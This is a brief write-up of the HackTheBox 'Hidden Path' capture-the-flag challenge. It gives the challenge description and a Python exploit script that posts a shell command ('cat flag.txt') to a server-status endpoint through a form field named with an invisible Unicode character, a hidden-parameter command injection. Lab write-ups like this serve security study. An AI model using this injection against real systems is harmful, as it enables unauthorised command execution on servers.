HackTheBox Hidden Path Challenge

2025-02-14[Updated: 2025-02-14]

https://app.hackthebox.com/challenges/718

Description

Legends speak of the infamous Kamara-Heto, a black-hat hacker of old who rose to fame as they brought entire countries to their knees. Opinions are divided over whether the fabled figure truly existed, but the success of the team surely lies in the hope that they did, for the location of the lost vault is only known to be held on what remains of the NSA’s data centres. You have extracted the source code of a system check-up endpoint - can you find a way in? And was Kamara-Heto ever there?

Exploitation

#!/usr/bin/env python3
from requests import post
import sys

if len(sys.argv) < 2:
    print(f"Usage: python {sys.argv[0]} <ip:port>")
    sys.exit(1)
URL = f'http://{sys.argv[1]}/server_status'
params = {
    'choice': 6,
    '\u3164': 'cat flag.txt'
}
r = post(URL, data=params)
print(r.text)

Summary

Hidden Path: reduce the custom rules to a scriptable check and use the smallest reliable path to the flag.